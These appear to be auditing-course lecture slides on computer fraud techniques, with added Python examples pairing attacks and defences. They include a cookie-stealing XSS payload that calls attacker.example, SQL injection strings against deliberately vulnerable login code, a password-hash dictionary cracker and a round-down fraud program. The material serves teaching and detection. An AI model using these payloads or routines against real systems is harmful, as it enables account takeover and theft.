
CHAPTER 10
COMPUTER FRAUD AND ABUSE TECHNIQUES

Ninia C. Pauig-Lumauan, MBA, CPA
1st Semester SY 2021-2022
Lyceum of Aparri

Auditing- Information System


COMPUTER VIRUSES
• The digital world became a more dangerous place as virtually all companies are now connected to the Internet.
• With technological advancement, online banking has also been introduced to the previously conservative banking sector. A depositor need not visit his preferred bank for transfer and/or withdrawal transactions.
• All he needs is the app available on his smartphone or his computer, and he can pay his bills and other obligations.
• However, everyone concerned must be on the lookout for hackers, and the banks must provide safety nets for the security of depositors. Take the case of the recent BDO fiasco, where about P50 million was transferred out of the accounts of almost 700 depositors.
• With the Covid-19 pandemic, even ordinary households are connected to the Internet, as it has become mandatory for the education of pupils and students and for the "work from home" workforce.
• Computer viruses and worms, once slowly propagated through the sharing of computer disks, can now spread with tremendous speed via the Internet.


• Computer fraud and abuse have also moved into the digital world. These abuses can come from within a company as well as from outside.
• Many viruses and worms exploit known software vulnerabilities that can be corrected with a software patch.


• Therefore, a good defense against them is making sure that all software patches are installed as soon as they are available.
• A software patch can be an upgrade (adding features), a bug fix, a new hardware driver, or an update to address new issues such as security or stability problems. Only the security fixes close the holes that worms exploit, so security patches should be prioritized and their installation verified rather than assumed.
• Recent viruses and worms have attacked cellphones and personal electronic devices using text messages, Internet page downloads, and Bluetooth wireless technology.
• Flaws in Bluetooth applications open the device to attack.
• Bluesnarfing is stealing (snarfing) contact lists, images and other data using Bluetooth.


ILLUSTRATIVE EXAMPLE OF BLUESNARFING
• A reporter for TimesOnline accompanied Adam Laurie, a security expert, around London scanning for Bluetooth-compatible phones.
• Before a Bluetooth connection can be made, the person contacted is supposed to agree to accept the link.
• However, Laurie had written software to bypass this control, and identified vulnerable handsets at an average rate of one per minute. He downloaded entire phonebooks, calendars, diary contents and stored pictures. Phones up to 90 meters away were vulnerable.


BLUEBUGGING
• Bluebugging is taking control of someone else's phone to make or listen to calls, send or read text messages, connect to the Internet, forward the victim's calls, and call numbers that charge fees.
• These attacks will become more common as phones are used to pay for purchases: when a hacker wants something, all he has to do is bluebug a nearby phone and make the purchase.
• To reduce exposure, a phone's Bluetooth can be set to non-discoverable mode (or switched off when not in use) so that other devices cannot find it, and pairing requests from unknown devices should be rejected.
• Antivirus software for phones is being developed to deal with such problems.
• In the future, many other devices such as home security systems, home appliances, automobiles and elevators will be connected to the Internet and will be targets of viruses and worms.


COMPUTER FRAUD AND ABUSE TECHNIQUES

Address Resolution Protocol (ARP) Spoofing: Sending fake ARP messages to an Ethernet LAN. ARP is the networking protocol for determining a network host's hardware (MAC) address when only its IP or network address is known. A forged reply lets the attacker's machine answer for another host's IP address and receive that host's traffic.

Adware: Software that collects and forwards data to advertising companies or causes banner ads to pop up as the Internet is surfed.

Bluebugging: Taking control of a phone to make calls, send text messages, listen to calls or read text messages.
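The ARP spoofing entry above describes the forged reply; the following is an added example, not code from the slides, of how the attack is detected from observed traffic. It keeps a table of which MAC address has answered for each IP and alerts when an IP is claimed by more than one MAC, when a documented static binding (assumed here to come from the network documentation) is contradicted, or when one MAC answers for several IPs, which is what an attacker poisoning both ends of a conversation looks like. The ARP replies are constructed; in production, tools such as arpwatch or a switch's dynamic ARP inspection perform the same checks.

```python
"""Detect ARP spoofing from a list of observed ARP replies (added example, not from the slides)."""
from collections import defaultdict

# Constructed observations: (seconds since start, sender IP, sender MAC) taken from ARP replies
OBSERVED_ARP_REPLIES = [
    (0, "192.168.1.1", "aa:bb:cc:00:00:01"),    # real gateway
    (5, "192.168.1.20", "aa:bb:cc:00:00:20"),   # workstation
    (9, "192.168.1.1", "aa:bb:cc:00:00:01"),
    (12, "192.168.1.1", "de:ad:be:ef:00:99"),   # attacker now answers for the gateway IP
    (13, "192.168.1.20", "de:ad:be:ef:00:99"),  # ...and for the workstation, to poison both sides
    (20, "192.168.1.30", "aa:bb:cc:00:00:30"),
]

# Assumed static binding for the default gateway, taken from the network documentation
KNOWN_BINDINGS = {"192.168.1.1": "aa:bb:cc:00:00:01"}


def claims_by_ip(replies):
    """Map each IP address to the set of MAC addresses that have claimed it."""
    seen = defaultdict(set)
    for _, ip, mac in replies:
        seen[ip].add(mac.lower())
    return dict(seen)


def claims_by_mac(replies):
    """Map each MAC address to the set of IP addresses it has claimed."""
    seen = defaultdict(set)
    for _, ip, mac in replies:
        seen[mac.lower()].add(ip)
    return dict(seen)


def detect_arp_spoofing(replies, known=KNOWN_BINDINGS):
    """Return a list of alert strings; an empty list means nothing suspicious was seen."""
    alerts = []
    by_ip = claims_by_ip(replies)

    # 1. One IP answered by more than one MAC: a host changed NIC, or someone is spoofing it.
    for ip, macs in sorted(by_ip.items()):
        if len(macs) > 1:
            alerts.append(f"{ip} claimed by {len(macs)} MACs: {', '.join(sorted(macs))}")

    # 2. A documented static binding contradicted by traffic.
    for ip, mac in known.items():
        for bad in sorted(by_ip.get(ip, set()) - {mac.lower()}):
            alerts.append(f"static binding violated: {ip} should be {mac.lower()}, saw {bad}")

    # 3. One MAC answering for several IPs: typical of an attacker poisoning both ends of a conversation.
    for mac, ips in sorted(claims_by_mac(replies).items()):
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(OBSERVED_ARP_REPLIES):
        print("ALERT:", alert)
```

The first three replies alone produce no alert; the attacker's two replies at 12 and 13 seconds trigger all three rules. A legitimate NIC replacement also trips rule 1, so the static-binding and multi-IP rules are what separate an incident from a change.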


Bluesnarfing: Stealing contact lists, images and other data using Bluetooth.

Bot Net, Bot Herders: A network of hijacked computers. Bot herders use the hijacked computers, called zombies, in a variety of Internet attacks.

Buffer Overflow Attack: Inputting so much data that the input buffer overflows into adjacent memory. The overflow is crafted so that it contains code, or overwrites a saved address, that takes control of the computer.

Caller ID Spoofing: Displaying an incorrect number on the recipient's Caller ID display to hide the identity of the caller.


Carding: Verifying the validity of stolen credit cards, and buying and selling them.

Chipping: Planting a chip that records transaction data in a legitimate card reader.

Cross-Site Scripting (XSS) Attack: Exploits a Web page vulnerability to bypass browser security mechanisms; the attacker creates a malicious link or input that injects unwanted script into a Web site, and that script then runs in other visitors' browsers with the site's privileges.

Cyber Bullying: Using computer technology to harm another person.
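Added example (not from the slides) of the cross-site scripting entry above: a search page that pastes the query straight into its HTML, beside the same page with output escaping and a link-target check. The page template, the attacker's payload and the link targets are constructed.

```python
"""Reflected cross-site scripting: unescaped output beside the escaped version (added example, not from the slides)."""
import html
from urllib.parse import urlsplit

# Constructed attacker input, the kind carried in a crafted link such as /search?q=<payload>
ATTACK = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'

# Constructed page template: the query is echoed back, and a "Back" link target is also user-controlled
PAGE = "<h1>Results for: {query}</h1>\n<a href=\"{back}\">Back</a>"


def render_vulnerable(query, back="/"):
    """Concatenates raw input into the page: any tags in the input become part of the page's markup."""
    return PAGE.format(query=query, back=back)


def safe_href(url):
    """Allow only relative or http(s) links in href; javascript: and data: URLs become a dead link."""
    url = url.strip()
    if urlsplit(url).scheme.lower() not in ("", "http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_safe(query, back="/"):
    """Escapes <, >, &, and quotes so the input is displayed as text, and filters the link target."""
    return PAGE.format(query=html.escape(query, quote=True), back=safe_href(back))


def has_live_script(fragment):
    """Crude check used below: does the produced HTML still contain an unescaped <script tag?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(render_vulnerable(ATTACK, back="javascript:alert(document.cookie)"))
    print(render_safe(ATTACK, back="javascript:alert(document.cookie)"))
```

Escaping is context-specific: the same `html.escape` that is right for element text and quoted attribute values is not enough for a URL scheme, which is why `safe_href` checks the scheme separately.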


Cyber Extortion: Requiring a company to pay money to keep an extortionist from harming a computer or a person.

Data Diddling: Changing data before, during, or after it is entered into the system.

Data Leakage: Unauthorized copying of company data.

Denial of Service (DoS) Attack: An attack designed to make computer resources unavailable to their users; for example, sending so many e-mail messages that the Internet Service Provider's e-mail server is overloaded and shuts down.


Dictionary Attack: In the spam context, using software to guess company e-mail addresses, send those addresses blank e-mails, and add the addresses whose messages are not returned as undeliverable to spammer e-mail lists. The same term is also used for guessing passwords by trying every word in a list (see Password Cracking).

DNS Spoofing: Sniffing the ID of a Domain Name System request (DNS is the service that converts a Web site name to an IP address) and replying with a forged answer before the real DNS server does.

Eavesdropping: Listening to private voice or data transmissions.


Economic Espionage: The theft of information, trade secrets and intellectual property.

E-mail Threats: Sending a threatening message asking recipients to do something that makes it possible to defraud them.

E-mail Spoofing: Making a sender address and other parts of an e-mail header appear as though the e-mail originated from a different source.

Evil Twin: A wireless network with the same name as a legitimate wireless access point. Users unknowingly connect to the evil twin, and hackers monitor the traffic looking for useful information.


Hacking: Unauthorized access, modification, or use of computer systems, usually by means of a PC and a communications network.

Hijacking: Gaining control of someone else's computer for illicit activities.

IP Address Spoofing: Creating Internet Protocol packets with a forged source IP address to hide the sender's identity or to impersonate another computer system.

Identity Theft: Assuming someone's identity by illegally obtaining confidential information such as a Social Security Number.


Internet Auction Fraud: Using an Internet auction site to commit fraud.

Internet Misinformation: Using the Internet to spread false or misleading information.

Internet Terrorism: Using the Internet to disrupt communications and commerce.

Internet Pump-and-Dump Fraud: Using the Internet to pump up the price of a stock and then selling it.

Key Logger: Using spyware to record a user's keystrokes.


Lebanese Looping: Inserting a sleeve into an ATM so that it will not eject the victim's card, pretending to help the victim as a means to discover his or her PIN, and then using the card and the PIN to drain the account.

Logic Bombs and Time Bombs: Software that sits idle until a specified circumstance or time triggers it, destroying programs, data or both.

Malware: Software that can be used to do harm.

Man-in-the-Middle (MITM) Attack: A hacker placing himself between a client and a host to intercept, and possibly alter, network traffic. Taking over an established connection from that position is called session hijacking.


Masquerading/Impersonation: Accessing a system by pretending to be an authorized user. The impersonator enjoys the same privileges as the legitimate user.

Packet Sniffing: Inspecting information packets as they travel the Internet and other networks.

Password Cracking: Penetrating system defenses, stealing the stored (hashed) passwords, and recovering them by guessing, typically with a dictionary or brute-force search, in order to access system programs, files and data.

Pharming: Redirecting traffic to a spoofed Web site to obtain confidential information.
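Added example (not from the slides) for the Dictionary Attack and Password Cracking entries: a wordlist run against stolen unsalted SHA-1 hashes, then against salted PBKDF2 records. The wordlist, the "stolen" records and the iteration count are constructed; the point is the work counter, which shows why a per-user salt and a slow hash change the cost of the attack.

```python
"""Dictionary attack on stolen password hashes, and why salted, slow hashing changes the economics
(added example, not from the slides)."""
import hashlib
import hmac
import os

# Constructed wordlist; real ones run to hundreds of millions of entries
WORDLIST = ["password", "letmein", "123456", "Welcome1", "qwerty", "summer2021"]


def unsalted_sha1(password):
    """Legacy storage: one fast, unsalted hash per password."""
    return hashlib.sha1(password.encode()).hexdigest()


def crack_unsalted(stolen, wordlist):
    """Hash each word once and look every account up in the resulting table.
    Returns (recovered passwords by user, number of hashes computed)."""
    table = {unsalted_sha1(w): w for w in wordlist}
    found = {user: table[h] for user, h in stolen.items() if h in table}
    return found, len(wordlist)


def pbkdf2(password, salt, iterations):
    """Salted, deliberately slow key derivation (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def store_salted(password, iterations=200_000):
    """What the defender stores: a random per-user salt plus the derived key."""
    salt = os.urandom(16)
    return salt, pbkdf2(password, salt, iterations)


def verify_salted(password, record, iterations=200_000):
    """Defender-side check, compared in constant time."""
    salt, digest = record
    return hmac.compare_digest(pbkdf2(password, salt, iterations), digest)


def crack_salted(stolen, wordlist, iterations=200_000):
    """Every account needs its own pass over the wordlist at full PBKDF2 cost; no shared table is possible.
    Returns (recovered passwords by user, number of PBKDF2 computations)."""
    found, work = {}, 0
    for user, (salt, digest) in stolen.items():
        for w in wordlist:
            work += 1
            if pbkdf2(w, salt, iterations) == digest:
                found[user] = w
                break
    return found, work


# Constructed "stolen" table of unsalted hashes
STOLEN_UNSALTED = {
    "alice": unsalted_sha1("Welcome1"),
    "bob": unsalted_sha1("qwerty"),
    "carol": unsalted_sha1("correct horse battery staple"),
}

if __name__ == "__main__":
    found, work = crack_unsalted(STOLEN_UNSALTED, WORDLIST)
    print(f"unsalted: recovered {found} with {work} hashes for {len(STOLEN_UNSALTED)} users")
    stolen_salted = {u: store_salted(p) for u, p in [("alice", "Welcome1"), ("carol", "correct horse battery staple")]}
    found, work = crack_salted(stolen_salted, WORDLIST)
    print(f"salted: recovered {found} with {work} PBKDF2 runs of 200000 iterations each")
```

With unsalted hashes the attacker's cost is the size of the wordlist regardless of how many accounts were stolen; with per-user salts it is wordlist size times number of accounts, each step costing 200,000 HMAC computations instead of one. Carol's passphrase is not in the list and is not recovered either way, which is the other half of the defense.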


Phishing: Communications that request recipients to disclose confidential information by responding to an e-mail or visiting a Web site.

Phreaking: Attacking phone systems to get free phone access; using phone lines to transmit viruses and to access, steal and destroy data.

Piggybacking: (1) Clandestine use of someone's Wi-Fi network. (2) Tapping into a communication line and entering a system by latching onto a legitimate user's session. (3) Bypassing physical security controls by entering a secure door when an authorized person opens it (also called tailgating).


Podslurping: Using a small device with storage capacity (iPod, flash drive) to download unauthorized data from a computer.

Posing: Creating a seemingly legitimate business, collecting personal data while making a sale, and never delivering the items sold.

Pretexting: Acting under false pretenses to gain confidential information.

Rootkit: Software that conceals processes, files, network connections and system data from the operating system and other programs.


Round-Down Fraud: Truncating interest calculations at two decimal places and placing the truncated fractions of a cent in the perpetrator's account.

Ransomware: Software that encrypts programs and data and demands a ransom in exchange for the key that decrypts them.

Salami Technique: Stealing tiny slices of money over time; round-down fraud is one instance.

Scareware: Malicious software of no benefit that is sold using scare tactics.

Scavenging/Dumpster Diving: Searching for confidential information in discarded documents and records in garbage cans, communal trash bins and city dumps.
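Added example (not from the slides) for the Round-Down Fraud and Salami Technique entries above: the doctored interest program beside the honest one, and the two audit checks that expose it. The rate, the balances, the account numbers and the bank's rounding policy are all constructed.

```python
"""Round-down (salami) fraud on interest postings, and the independent recomputation an auditor uses
to expose it (added example, not from the slides)."""
from decimal import Decimal, ROUND_DOWN, ROUND_HALF_EVEN

CENT = Decimal("0.01")
ANNUAL_RATE = Decimal("0.0325")   # assumed deposit rate

# Constructed month-end balances; "9999" is the perpetrator's own account
ACCOUNTS = {
    "1001": Decimal("1234.56"),  "1002": Decimal("98765.43"),
    "1003": Decimal("500.00"),   "1004": Decimal("25000.00"),
    "1005": Decimal("7777.77"),  "1006": Decimal("150.25"),
    "1007": Decimal("61200.00"), "9999": Decimal("50.00"),
}
PERP = "9999"


def exact_interest(balance):
    """Unrounded monthly interest."""
    return balance * ANNUAL_RATE / 12


def honest_posting(accounts):
    """Assumed bank policy: round each account's interest half-to-even to the cent."""
    return {a: exact_interest(b).quantize(CENT, rounding=ROUND_HALF_EVEN) for a, b in accounts.items()}


def fraudulent_posting(accounts, perp=PERP):
    """The doctored program: truncate every account and credit the shaved fractions to the perpetrator."""
    posted, shaved = {}, Decimal("0")
    for a, b in accounts.items():
        exact = exact_interest(b)
        truncated = exact.quantize(CENT, rounding=ROUND_DOWN)
        posted[a] = truncated
        shaved += exact - truncated
    posted[perp] += shaved.quantize(CENT, rounding=ROUND_DOWN)
    return posted


def audit_recompute(accounts, posted):
    """Recompute every posting independently under the stated policy.
    Returns (account, expected, posted, posted - expected) for each mismatch."""
    expected = honest_posting(accounts)
    findings = []
    for a, amount in posted.items():
        exp = expected.get(a, Decimal("0"))
        if amount != exp:
            findings.append((a, exp, amount, amount - exp))
    return findings


def rounding_direction(accounts, posted, exclude=()):
    """Count postings below and above the exact figure. Honest rounding goes both ways about equally;
    truncation only ever goes down, so (many, 0) is the fingerprint of round-down fraud."""
    down = up = 0
    for a, b in accounts.items():
        if a in exclude:
            continue
        exact = exact_interest(b)
        if posted[a] < exact:
            down += 1
        elif posted[a] > exact:
            up += 1
    return down, up


if __name__ == "__main__":
    fraud = fraudulent_posting(ACCOUNTS)
    for acct, exp, got, diff in audit_recompute(ACCOUNTS, fraud):
        flag = "MATERIAL" if abs(diff) > CENT else "rounding-size"
        print(f"{acct}: expected {exp} posted {got} diff {diff} {flag}")
    print("direction (down, up), fraud: ", rounding_direction(ACCOUNTS, fraud, exclude={PERP}))
    print("direction (down, up), honest:", rounding_direction(ACCOUNTS, honest_posting(ACCOUNTS), exclude={PERP}))
```

In this small constructed set a month's shavings are a few cents; over thousands of accounts and periods they add up, while every individual account is off by at most one cent, which a tolerance-based comparison would wave through. The checks that work are concentration (one posting far above what its balance supports) and direction (every rounding error pointing the same way).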


Sexting: Exchanging sexually explicit texts and pictures.

Shoulder Surfing: Watching or listening to people enter or disclose confidential data.

Skimming: Double-swiping a credit card, or covertly swiping it in a card reader that records the data for later use.

SMS Spoofing: Using the short message service (SMS) to change the name or number a text message appears to come from.

Social Engineering: Techniques that trick a person into disclosing confidential information or taking an action that helps the attacker.


Software Piracy: Unauthorized copying or distribution of copyrighted software.

Spamming: E-mailing an unsolicited message to many people at the same time.

Splog: A spam blog that promotes Web sites to increase their Google PageRank (a measure of how often a Web page is linked to by other pages).

Spyware: Software that monitors computing habits and sends that data to someone else, often without the user's permission.


Spoofing: Making electronic communications look like someone else sent them.

SQL Injection Attack: Inserting a malicious SQL fragment into input in such a way that it is passed to, and executed by, the database as part of an application's query.

Steganography: Hiding data from one file inside a host file, such as a large image or sound file.

Superzapping: Using special software to bypass system controls and perform illegal acts.

Tabnapping: Secretly changing an already open browser tab, using JavaScript, so that it imitates a login page.
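Added example (not from the slides) for the SQL Injection entry: a login query built by string formatting beside the parameterized version, run against an in-memory SQLite table. The table contents and the attacker's inputs are constructed.

```python
"""SQL injection: a string-built login query beside a parameterized one, run against an in-memory
SQLite table (added example, not from the slides)."""
import sqlite3


def make_db():
    """Constructed users table. Passwords are stored in clear only to keep the example short;
    a real system stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "user"), ("admin", "hunter2", "admin")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string formatting, so a quote in the input ends the literal
    and whatever follows is executed as SQL."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Sends the statement and the values separately; the driver never parses the values as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Constructed attacker inputs
COMMENT_OUT = "admin' --"        # closes the string, then comments out the password check
TAUTOLOGY = "' OR '1'='1"        # makes the WHERE clause true for every row

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, comment-out:", login_vulnerable(db, COMMENT_OUT, "wrong"))
    print("vulnerable, tautology:  ", login_vulnerable(db, "nobody", TAUTOLOGY))
    print("safe, same inputs:      ", login_safe(db, COMMENT_OUT, "wrong"), login_safe(db, "nobody", TAUTOLOGY))
    print("safe, real credentials: ", login_safe(db, "admin", "hunter2"))
```

The tautology goes in the password field because AND binds tighter than OR: placed in the username field it would be neutralized by the password check that follows it. Note that the fix is the parameter placeholder, not input filtering; the safe version needs no list of forbidden characters.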


Trap Door: A back door into a system that bypasses normal system controls.

Trojan Horse: Unauthorized code hidden in an authorized and properly functioning program.

Typosquatting/URL Hijacking: Web sites with names similar to real Web sites; users making typographical errors are sent to a site filled with malware.

Virus: Executable code that attaches itself to software, replicates itself and spreads to other systems or files. Triggered by a predefined event, it damages system resources or displays messages.
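Added example (not from the slides) for the Typosquatting/URL Hijacking entry, generalized from mistyped names to look-alike domains in general: it compares a domain against a trusted list using edit distance, a homoglyph table and a brand-containment rule, the kind of check an accounts-payable team can run on the sender domain of a payment-change request. The trusted list and the sample domains are constructed (the .example top-level domain is reserved for documentation).

```python
"""Flag look-alike domains against a list the organization trusts (added example, not from the slides)."""

# Constructed trusted list
TRUSTED = ["examplebank.example", "supplier.example", "payroll-portal.example"]

# Character sequences that read like another when displayed in a link or e-mail address
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("|", "l"), ("3", "e"), ("5", "s")]


def canonical(domain):
    """Lower-case, drop a trailing dot and a leading www."""
    d = domain.strip().lower().rstrip(".")
    return d[4:] if d.startswith("www.") else d


def normalize(domain):
    """Replace look-alike sequences so homoglyph variants collapse onto the genuine spelling."""
    d = canonical(domain)
    for lookalike, real in HOMOGLYPHS:
        d = d.replace(lookalike, real)
    return d


def edit_distance(a, b):
    """Levenshtein distance by the standard dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain, trusted=TRUSTED, max_distance=2):
    """Return 'trusted', 'unrelated', or which trusted domain the name imitates and how."""
    d = canonical(domain)
    if d in trusted:
        return "trusted"
    nd = normalize(d)
    for t in trusted:
        nt = normalize(t)
        if nd == nt:
            return f"lookalike of {t} (homoglyph)"
        dist = edit_distance(nd, nt)
        if dist <= max_distance:
            return f"lookalike of {t} (edit distance {dist})"
        brand = t.split(".")[0]
        if brand in nd.split(".")[0]:
            return f"lookalike of {t} (contains brand)"
    return "unrelated"


if __name__ == "__main__":
    for sample in ["www.ExampleBank.example", "exarnplebank.example", "examp1ebank.example",
                   "exampIebank.example", "examplebank-login.example", "weather.example"]:
        print(f"{sample:28} {classify(sample)}")
```

An edit-distance threshold of 2 catches single typos and transpositions without flagging unrelated short names; the homoglyph table handles the cases edit distance cannot (rn for m changes two characters into one), and the containment rule covers brand-plus-suffix registrations such as examplebank-login.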


Vishing: Voice phishing, in which e-mail recipients are asked to call a phone number that asks them to divulge confidential data.

War Dialing: Dialing phone lines to find idle modems to use to enter a system, capture the attached computer and gain access to its network(s).

War Driving/Rocketing: Looking for unprotected wireless networks by driving around with a car, or by sending up a rocket carrying a detector.

Web Cramming: Developing a free and worthless trial-version Web site and charging the subscriber's phone bill for months even if the subscriber cancels.


Web Page Spoofing: Creating a look-alike copy of a legitimate Web page to capture what users enter on it; the usual vehicle for phishing.

Worm: Similar to a virus, but a stand-alone program rather than a code segment hidden in a host program. It actively transmits itself to other systems. It usually does not live long but is quite destructive while alive.

Zero-Day Attack: An attack made between the time a software vulnerability is discovered and the time a patch to fix the problem is released (in practice, until the patch is actually installed).


ONLINE SOCIAL ENGINEERING
• Online social engineering is on the rise.
• Online social engineering is when scammers emotionally manipulate you into handing over your personal information. They take advantage of human behavior and trick you into thinking they are the real deal.

FOUR TIPS TO PREVENT A SOCIAL ENGINEERING ATTACK:
1. Never reveal passwords or PINs via e-mail or phone, no matter how legitimate the request seems. Companies do not ask for these this way.
2. Call them back. If you receive a call from a company requesting sensitive information, ask for the caller's full name and call back on the number from the company's website, not on a number the caller gives you.
3. Resist the urge to click on suspicious links from anyone, even if you think you know them; always double-check the web address first.
4. Think twice. If something sounds too good to be true, then it probably is, even if it looks and sounds like it is coming from a reputable source.
SOCIAL ENGINEERING: WHAT DOES IT LOOK LIKE?
• Phishing, Smishing, Vishing: scammers will reach you using e-mails, SMS and phone calls.
• Quid Pro Quo: Quite often, scammers will offer you something like technical assistance, access to a protected document, or a solution for a problem. They may not ask for money. Their goal is your login details, which they can use or sell.
• Capturing Curiosity: Curiosity is a big part of our human nature, but it is also a weakness for scammers to exploit. Found an abandoned USB stick? Never put it into your computer; it is an easy way for hackers to break in.
• Pretexting: This is when an attacker gathers information on you in order to gain your trust. One way is impersonating someone from your workplace and requesting changes to payments. This one commonly targets finance teams and is often successful.
• Your antivirus and e-mail filters can block many phishing e-mails, suspicious links and downloads, but social engineering plays on the weaknesses of human nature, which no software checks.
• That is why it is so important to be familiar with the various types of social engineering scams, so you can avoid them.


INSIDER ABUSE OF INTERNET ACCESS
• Robert Hanssen, an FBI agent with high security clearance, was one of the most damaging spies in U.S. history. Hanssen was convicted of espionage for spying for Russia over 22 years. Hanssen said that security was so lax at FBI headquarters that he never worried about being searched.
• He combed the FBI's computer system to obtain and disseminate over 6,000 classified documents, and even to check whether he was under suspicion.
• He was quoted as saying, "Any clerk in the bureau could come up with stuff on that system. It was pathetic."
• The FBI reportedly cancelled a classified computer system fearing that Hanssen, a skilled computer programmer, might have planted malicious code or a back door in the system.


• Frank Gruttadauria, a former Lehman Brothers Holdings, Inc. stockbroker manager, admitted in 2002 to bilking investors out of $277 million over the previous 15 years. He simply shifted money from one account to another, systematically looting each one.
• Timothy Lloyd, a former New Jersey computer programmer for Omega Engineering Corporation, was convicted in May 2000 of causing about $12 million in damages. Prior to being fired in 1996, Lloyd planted a logic bomb that erased all of Omega's contracts and the proprietary software used by the company's manufacturing tools. One Omega manager said that it would "never recover." Lloyd's actions also caused the layoff of 80 employees.
• Bill Conley, former president of U.S. Computer Corporation of Redmond, Washington, pled guilty to federal wire-fraud charges and agreed to pay Hewlett-Packard (HP) $1.5 million after admitting he had paid an HP employee to reveal competitors' bids on used computer servers, thereby enabling him to buy the equipment by submitting slightly higher bids.
• These cases are only those that involved insiders.
• Even more common are cases of fraud and identity theft by criminals external to organizations.


• To help combat the threats of terrorism, insider abuse, external fraud, identity theft, and other major risks, all organizations must be more diligent about implementing internal controls, including computer security and physical security, operational and accounting controls, and employee and consultant background checks.
• Organizations must also work with the applicable governmental agencies so that offenders can be charged and any necessary changes can be made to applicable laws and regulations.
• In extreme cases, such cooperation could even help military leaders determine where to deploy support.


BIOMETRIC TECHNOLOGIES
• Biometric technologies generally refer to the use of technology to identify a person based on some aspect of their biology.
• Fingerprint recognition is one of the first and original biometric technologies, and has been grouped loosely under digital forensics.
• Others are iris scanning, foot scanning, voice pattern identification and facial recognition.
• Biometric technologies are gaining in reliability and their costs have come down.
• Therefore, applications of biometric technologies to access controls that help prevent fraud and help ensure security are becoming more commonplace.
• One credit union is using hand-image verification in conjunction with a personal identification number to provide unescorted access to safe deposit boxes.
• Similar technologies are becoming available for automated teller machines, airport security devices, driver's licenses, and state-issued identification cards.
• While biometric controls will likely replace or at least supplement passwords and additional controls, they, too, can be circumvented. A Japanese researcher (Tsutomu Matsumoto, 2002) found that he could create fake fingers from gelatin and fool fingerprint readers an average of 80 percent of the time.
• Perhaps a more critical concern is theft of the electronic "prints" of innocent people and subsequent use of the information to steal identities: a compromised password can be changed, a compromised fingerprint cannot.
• Therefore, IS auditors will need to be alert to the limitations of the biometrics that they encounter in their organization.


CONCLUSION
• Given the various hats IT auditors can wear, they must keep updated with reviews of, and changes in, the existing laws governing the use of computers and the Internet.
• IT auditors can provide leverage in helping organizations understand the risks they face and their potential consequences.
• Since the culture and operational practices of each organization and each country are different, it is up to the internal and external auditors of all organizations to ensure that management is aware of the IS risks discussed, any risks that are unique to their organizations and countries, and the new risks posed by emerging technologies and terrorism.
• Once risks are identified, internal controls can be tailored to mitigate them and to result in healthy and thriving IS environments within their organizations, as well as a safer world for all of us.